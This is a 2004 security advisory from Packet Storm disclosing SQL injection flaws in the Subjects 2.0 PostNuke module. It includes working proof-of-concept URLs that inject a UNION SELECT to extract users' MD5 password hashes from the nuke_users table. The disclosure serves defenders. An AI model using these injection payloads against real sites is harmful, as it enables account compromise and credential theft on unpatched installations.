subjects2.txt

2004-09-10T00:00:00
ID PACKETSTORM:34323
Type packetstorm
Reporter criolabs.net
Modified 2004-09-10T00:00:00

Description

                                        
                                            `****************************************************************************************************  
CRIOLABS  
  
  
- Software: Subjects 2.0   
- Type: Postnuke module  
- Vendor: Postnuke Modules Factory.  
  
  
  
****************************************************************************************************  
  
  
  
## Software ##  
  
Software: Subjects Postnuke module  
Version: 2.0  
Plataforms: Unix/Win/PHP/MySQL/Postnuke  
Web: http://home.postnuke.ru  
  
  
## Vendor Description ##  
  
Module is designed for structured store & display text content with a possibility to store  
content in file on the disc. Probably, the best one for converting existing based on HTML pages  
site to PostNuke.  
  
  
  
## Vulnerabilities ##  
  
Sql-Injection in pageid, subid, catid variables.  
  
  
  
## Sql-Injection ##  
  
  
The previous variables are vulnerables to SQL-Injection attacks.  
These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.  
  
/index.php?module=subjects&func=listpages&subid=[SQL]  
/index.php?module=subjects&func=viewpage&pageid=[SQL]  
/index.php?module=subjects&func=listcat&catid=[SQL]  
  
  
## Proof of Concept ##  
  
  
URL to retrieve the MD5 password hash of a user. This POC needs UNION functionality enabled in Mysql to retrieve  
the hash.  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null  
%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*  
  
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null  
%20FROM%20nuke_users%20WHERE%20pn_uid=2/*   
  
  
  
## History ##  
  
  
Vendor contacted but no response.  
  
  
  
## Solution ##  
  
  
There is no solution at this time, we recommend to remove immediately this module  
  
  
  
## Credits ##  
  
  
Criolabs staff  
http://www.criolabs.net   
  
`